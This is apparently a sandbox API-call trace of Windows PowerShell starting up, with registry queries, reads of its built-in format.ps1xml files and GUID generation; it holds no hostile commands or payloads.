	[0751.210] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed0a8 | out: phkResult=0xed0a8*=0x31c) returned 0x0
	[0751.210] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed02c, lpData=0x0, lpcbData=0xed028*=0x0 | out: lpType=0xed02c*=0x1, lpData=0x0, lpcbData=0xed028*=0x56) returned 0x0
	[0751.210] CoTaskMemAlloc (cb=0x5a) returned 0x1b6d8f40
	[0751.210] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xecffc, lpData=0x1b6d8f40, lpcbData=0xecff8*=0x56 | out: lpType=0xecffc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xecff8*=0x56) returned 0x0
	[0751.210] CoTaskMemFree (pv=0x1b6d8f40) 
	[0751.210] RegCloseKey (hKey=0x31c) returned 0x0
	[0751.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xeccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0751.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0751.219] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x3a1d97f1, Data2=0x39af, Data3=0x4da1, Data4=([0]=0xad, [1]=0x20, [2]=0x71, [3]=0x99, [4]=0x94, [5]=0x5b, [6]=0x4a, [7]=0x42))) returned 0x0
	[0751.221] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x434734ff, Data2=0xa15f, Data3=0x41aa, Data4=([0]=0xb1, [1]=0xdd, [2]=0xb2, [3]=0x1d, [4]=0x9f, [5]=0x9f, [6]=0xa9, [7]=0x2d))) returned 0x0
	[0751.222] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xc8c795ce, Data2=0x2930, Data3=0x4467, Data4=([0]=0xa8, [1]=0x30, [2]=0xf7, [3]=0x68, [4]=0xfb, [5]=0xed, [6]=0xb7, [7]=0xed))) returned 0x0
	[0751.222] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xec491358, Data2=0xc3dc, Data3=0x4256, Data4=([0]=0xb6, [1]=0xac, [2]=0xaf, [3]=0x42, [4]=0xa6, [5]=0x1b, [6]=0x67, [7]=0xab))) returned 0x0
	[0751.223] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x9e46aed6, Data2=0x1131, Data3=0x4a60, Data4=([0]=0x82, [1]=0x3c, [2]=0xf, [3]=0x7a, [4]=0xa1, [5]=0xf9, [6]=0xac, [7]=0xf2))) returned 0x0
	[0751.224] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xeefdd2c7, Data2=0x3ad, Data3=0x4024, Data4=([0]=0x95, [1]=0xb2, [2]=0xaa, [3]=0x5b, [4]=0x5e, [5]=0xf6, [6]=0xaa, [7]=0x1a))) returned 0x0
	[0751.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xeca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0751.224] SetErrorMode (uMode=0x1) returned 0x1
	[0751.224] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310
	[0751.225] GetFileType (hFile=0x310) returned 0x1
	[0751.225] SetErrorMode (uMode=0x1) returned 0x1
	[0751.225] GetFileType (hFile=0x310) returned 0x1
	[0751.225] ReadFile (in: hFile=0x310, lpBuffer=0x32fb8d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x32fb8d8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0751.225] ReadFile (in: hFile=0x310, lpBuffer=0x32fb8d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x32fb8d8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0751.225] ReadFile (in: hFile=0x310, lpBuffer=0x32fb8d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x32fb8d8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0751.226] ReadFile (in: hFile=0x310, lpBuffer=0x32fb8d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x32fb8d8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0751.226] ReadFile (in: hFile=0x310, lpBuffer=0x32fb8d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x32fb8d8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0751.226] ReadFile (in: hFile=0x310, lpBuffer=0x32fb8d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x32fb8d8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0751.226] ReadFile (in: hFile=0x310, lpBuffer=0x32fb8d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x32fb8d8*, lpNumberOfBytesRead=0xed018*=0xaca, lpOverlapped=0x0) returned 1
	[0751.226] ReadFile (in: hFile=0x310, lpBuffer=0x32faf0a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x32faf0a*, lpNumberOfBytesRead=0xed018*=0x0, lpOverlapped=0x0) returned 1
	[0751.226] ReadFile (in: hFile=0x310, lpBuffer=0x32fb8d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x32fb8d8*, lpNumberOfBytesRead=0xed018*=0x0, lpOverlapped=0x0) returned 1
	[0751.227] CloseHandle (hObject=0x310) returned 1
	[0751.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0751.227] SetErrorMode (uMode=0x1) returned 0x1
	[0751.227] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xecfc0 | out: lpFileInformation=0xecfc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0751.227] SetErrorMode (uMode=0x1) returned 0x1
	[0751.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xeccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0751.227] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed0a8 | out: phkResult=0xed0a8*=0x310) returned 0x0
	[0751.227] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed02c, lpData=0x0, lpcbData=0xed028*=0x0 | out: lpType=0xed02c*=0x1, lpData=0x0, lpcbData=0xed028*=0x56) returned 0x0
	[0751.228] CoTaskMemAlloc (cb=0x5a) returned 0x39a730
	[0751.228] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xecffc, lpData=0x39a730, lpcbData=0xecff8*=0x56 | out: lpType=0xecffc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xecff8*=0x56) returned 0x0
	[0751.228] CoTaskMemFree (pv=0x39a730) 
	[0751.228] RegCloseKey (hKey=0x310) returned 0x0
	[0751.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xeccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0751.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0751.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0xec530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0751.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xec530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0752.540] VirtualQuery (in: lpAddress=0xebb40, lpBuffer=0xeca00, dwLength=0x30 | out: lpBuffer=0xeca00*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0752.541] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xd8f4c9c6, Data2=0x7ec8, Data3=0x432d, Data4=([0]=0xb1, [1]=0x16, [2]=0xca, [3]=0x21, [4]=0xc4, [5]=0x42, [6]=0xc0, [7]=0x1))) returned 0x0
	[0752.542] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x78d2fcbe, Data2=0x3856, Data3=0x4f2b, Data4=([0]=0x8a, [1]=0x46, [2]=0x28, [3]=0xf8, [4]=0xa2, [5]=0x4, [6]=0x17, [7]=0x3b))) returned 0x0
	[0752.542] VirtualQuery (in: lpAddress=0xebcf0, lpBuffer=0xecbb0, dwLength=0x30 | out: lpBuffer=0xecbb0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0752.543] VirtualQuery (in: lpAddress=0xebcf0, lpBuffer=0xecbb0, dwLength=0x30 | out: lpBuffer=0xecbb0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0752.544] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xe8b79cad, Data2=0x505, Data3=0x4243, Data4=([0]=0x92, [1]=0x2, [2]=0x8, [3]=0xfc, [4]=0xcf, [5]=0x80, [6]=0x38, [7]=0xaa))) returned 0x0
	[0752.547] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xbcdc2c01, Data2=0x6fa5, Data3=0x47ce, Data4=([0]=0xbd, [1]=0xbc, [2]=0x66, [3]=0x75, [4]=0x1d, [5]=0x16, [6]=0x4a, [7]=0x3b))) returned 0x0
	[0752.547] VirtualQuery (in: lpAddress=0xebf40, lpBuffer=0xece00, dwLength=0x30 | out: lpBuffer=0xece00*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0752.548] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xa38fa9b3, Data2=0x6e46, Data3=0x445e, Data4=([0]=0x80, [1]=0xba, [2]=0x46, [3]=0xbb, [4]=0x22, [5]=0x6d, [6]=0x5c, [7]=0xfc))) returned 0x0
	[0752.548] VirtualQuery (in: lpAddress=0xeb5b0, lpBuffer=0xec470, dwLength=0x30 | out: lpBuffer=0xec470*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0752.548] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x1269c1f7, Data2=0xbf93, Data3=0x43ae, Data4=([0]=0x81, [1]=0x22, [2]=0xe5, [3]=0x95, [4]=0xea, [5]=0x68, [6]=0x88, [7]=0x56))) returned 0x0
	[0752.548] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x5acc4bed, Data2=0x7201, Data3=0x4cc4, Data4=([0]=0x83, [1]=0xd5, [2]=0x2d, [3]=0xf8, [4]=0x82, [5]=0xdc, [6]=0x56, [7]=0x85))) returned 0x0
	[0752.548] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310
	[0752.549] GetFileType (hFile=0x310) returned 0x1
	[0752.549] SetErrorMode (uMode=0x1) returned 0x1
	[0752.549] GetFileType (hFile=0x310) returned 0x1
	[0752.549] ReadFile (in: hFile=0x310, lpBuffer=0x33aded0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33aded0*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0752.550] ReadFile (in: hFile=0x310, lpBuffer=0x33aded0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33aded0*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0752.550] ReadFile (in: hFile=0x310, lpBuffer=0x33aded0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33aded0*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0752.550] ReadFile (in: hFile=0x310, lpBuffer=0x33aded0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33aded0*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0752.551] ReadFile (in: hFile=0x310, lpBuffer=0x33aded0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33aded0*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0752.551] ReadFile (in: hFile=0x310, lpBuffer=0x33aded0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33aded0*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0752.551] ReadFile (in: hFile=0x310, lpBuffer=0x33aded0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33aded0*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0752.551] ReadFile (in: hFile=0x310, lpBuffer=0x33aded0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33aded0*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0752.553] ReadFile (in: hFile=0x310, lpBuffer=0x33aded0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33aded0*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0752.553] ReadFile (in: hFile=0x310, lpBuffer=0x33aded0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33aded0*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0752.554] ReadFile (in: hFile=0x310, lpBuffer=0x33aded0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33aded0*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0752.554] ReadFile (in: hFile=0x310, lpBuffer=0x33aded0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33aded0*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0752.554] ReadFile (in: hFile=0x310, lpBuffer=0x33aded0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33aded0*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0752.555] ReadFile (in: hFile=0x310, lpBuffer=0x33aded0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33aded0*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0752.555] ReadFile (in: hFile=0x310, lpBuffer=0x33aded0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33aded0*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0752.556] ReadFile (in: hFile=0x310, lpBuffer=0x33aded0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33aded0*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0753.798] ReadFile (in: hFile=0x310, lpBuffer=0x33aded0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33aded0*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0753.798] ReadFile (in: hFile=0x310, lpBuffer=0x33aded0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33aded0*, lpNumberOfBytesRead=0xed018*=0xbce, lpOverlapped=0x0) returned 1
	[0753.799] ReadFile (in: hFile=0x310, lpBuffer=0x33ad606, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33ad606*, lpNumberOfBytesRead=0xed018*=0x0, lpOverlapped=0x0) returned 1
	[0753.799] ReadFile (in: hFile=0x310, lpBuffer=0x33aded0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33aded0*, lpNumberOfBytesRead=0xed018*=0x0, lpOverlapped=0x0) returned 1
	[0753.799] CloseHandle (hObject=0x310) returned 1
	[0753.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0753.799] SetErrorMode (uMode=0x1) returned 0x1
	[0753.799] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xecfc0 | out: lpFileInformation=0xecfc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0753.799] SetErrorMode (uMode=0x1) returned 0x1
	[0753.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xeccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0753.800] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed0a8 | out: phkResult=0xed0a8*=0x310) returned 0x0
	[0753.800] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed02c, lpData=0x0, lpcbData=0xed028*=0x0 | out: lpType=0xed02c*=0x1, lpData=0x0, lpcbData=0xed028*=0x56) returned 0x0
	[0753.800] CoTaskMemAlloc (cb=0x5a) returned 0x39aab0
	[0753.800] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xecffc, lpData=0x39aab0, lpcbData=0xecff8*=0x56 | out: lpType=0xecffc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xecff8*=0x56) returned 0x0
	[0753.800] CoTaskMemFree (pv=0x39aab0) 
	[0753.800] RegCloseKey (hKey=0x310) returned 0x0
	[0753.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xeccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0753.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0753.802] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xb53e474e, Data2=0xb534, Data3=0x4c73, Data4=([0]=0xa7, [1]=0x5c, [2]=0x41, [3]=0x20, [4]=0xa9, [5]=0xfc, [6]=0xe4, [7]=0x5b))) returned 0x0
	[0753.802] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xbec939ff, Data2=0xc5b2, Data3=0x4654, Data4=([0]=0x88, [1]=0x1e, [2]=0x20, [3]=0xef, [4]=0x56, [5]=0xb5, [6]=0x44, [7]=0x49))) returned 0x0
	[0753.802] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x838ef019, Data2=0x89c7, Data3=0x42bf, Data4=([0]=0x87, [1]=0xf0, [2]=0x35, [3]=0x95, [4]=0x7d, [5]=0x66, [6]=0x21, [7]=0xbc))) returned 0x0
	[0753.802] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x651c4dfb, Data2=0xe96a, Data3=0x4ac1, Data4=([0]=0x9b, [1]=0xb3, [2]=0x25, [3]=0x45, [4]=0x42, [5]=0x15, [6]=0x7d, [7]=0x5b))) returned 0x0
	[0753.802] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xf806169b, Data2=0x7cbd, Data3=0x45f1, Data4=([0]=0x92, [1]=0xb5, [2]=0xce, [3]=0x13, [4]=0x45, [5]=0x7e, [6]=0x92, [7]=0xb3))) returned 0x0
	[0753.802] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x16117877, Data2=0x5565, Data3=0x41d6, Data4=([0]=0x8a, [1]=0x22, [2]=0xbf, [3]=0xf3, [4]=0x72, [5]=0x1e, [6]=0xa7, [7]=0xfe))) returned 0x0
	[0753.803] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x89ef8ec0, Data2=0xc26, Data3=0x4420, Data4=([0]=0xaa, [1]=0x3, [2]=0xe1, [3]=0x9a, [4]=0x18, [5]=0xa0, [6]=0x57, [7]=0x1a))) returned 0x0
	[0753.803] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xcea576a6, Data2=0x391e, Data3=0x44aa, Data4=([0]=0x9e, [1]=0x76, [2]=0xa, [3]=0xe3, [4]=0x9f, [5]=0x71, [6]=0x29, [7]=0x10))) returned 0x0
	[0753.803] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xa7850128, Data2=0xd540, Data3=0x4a8e, Data4=([0]=0x99, [1]=0xd7, [2]=0x7a, [3]=0x87, [4]=0x1f, [5]=0xc, [6]=0xf4, [7]=0xc3))) returned 0x0
	[0753.803] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x638e13f6, Data2=0x7ea9, Data3=0x4ae1, Data4=([0]=0x88, [1]=0x8c, [2]=0x96, [3]=0xd0, [4]=0xd0, [5]=0x30, [6]=0x10, [7]=0x24))) returned 0x0
	[0753.803] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x4e31f9a5, Data2=0x84e2, Data3=0x4b1c, Data4=([0]=0x8c, [1]=0x1c, [2]=0x2, [3]=0x2c, [4]=0x5b, [5]=0x2b, [6]=0x46, [7]=0x71))) returned 0x0
	[0753.804] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xd16735e9, Data2=0x6978, Data3=0x41da, Data4=([0]=0x8b, [1]=0x1d, [2]=0x70, [3]=0x6e, [4]=0xca, [5]=0x87, [6]=0xaf, [7]=0xe7))) returned 0x0
	[0753.804] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x65f0afc0, Data2=0x7891, Data3=0x42e9, Data4=([0]=0xa8, [1]=0xe9, [2]=0x19, [3]=0xd3, [4]=0xe1, [5]=0xfa, [6]=0x25, [7]=0x39))) returned 0x0
	[0753.804] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x610cc75b, Data2=0x5713, Data3=0x4375, Data4=([0]=0x81, [1]=0x5d, [2]=0xed, [3]=0x42, [4]=0x48, [5]=0x7d, [6]=0xe0, [7]=0x9))) returned 0x0
	[0753.804] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x90fb663d, Data2=0xb774, Data3=0x42e6, Data4=([0]=0xb0, [1]=0x49, [2]=0xce, [3]=0x20, [4]=0x19, [5]=0x5a, [6]=0x54, [7]=0x8))) returned 0x0
